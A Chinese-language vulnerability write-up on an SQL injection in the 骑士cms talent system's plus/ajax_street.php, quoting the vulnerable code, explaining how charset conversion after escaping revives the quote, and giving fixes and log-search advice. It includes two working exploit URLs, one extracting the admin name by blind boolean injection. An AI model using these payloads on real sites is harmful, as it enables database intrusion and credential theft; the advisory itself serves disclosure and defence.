骑士cms人才系统 通杀SQL注入

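代码出现在 plus/ajax_street.php 文件中，43 行开始：

[php]
elseif($act == 'key')
{
	$key=trim($_GET['key']);
	if (!empty($key))
	{
		if (strcasecmp(QISHI_DBCHARSET,"utf8")!=0)
			$key=iconv("utf-8",QISHI_DBCHARSET,$key);
		$result = $db->query("select * from ".table('category')." where c_alias='QS_street' AND c_name LIKE '%{$key}%' ");
		while($row = $db->fetch_array($result))
		{
			if ($listtype=="li")
[/php]

成因：$key 只经过 trim() 就被直接拼接进 LIKE 子句。另外，iconv() 转码发生在拼接之前。本页没有展示程序的全局输入过滤，推测是 addslashes 一类的转义。如果这类转义在转码之前执行，那么在 QISHI_DBCHARSET 不是 utf8 时，转码生成的字节可能抵消已经加上的反斜杠转义，使单引号重新生效。

利用如下：

[php]
http://0day5.com/upload/plus/ajax_street.php?act=key&key=s%e9%8c%a6' or 1=1%23
http://0day5.com/upload/plus/ajax_street.php?act=key&key=s%e9%8c%a6' or cast(ascii(substring((select admin_name from qs_admin),1,1))=97 as signed) %23
[/php]

修复建议：先完成编码转换，再处理 $key。处理时使用参数绑定（预处理语句）；如果 $db 封装不支持参数绑定，则使用与数据库连接字符集一致的转义函数。LIKE 中的 % 和 _ 通配符需要另行转义。不要依赖在转码之前完成的全局转义。排查时，可在 Web 访问日志中检索对 plus/ajax_street.php 且 act=key 的请求，重点关注 key 参数中含有单引号、%23 或 select 等 SQL 关键字的记录。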
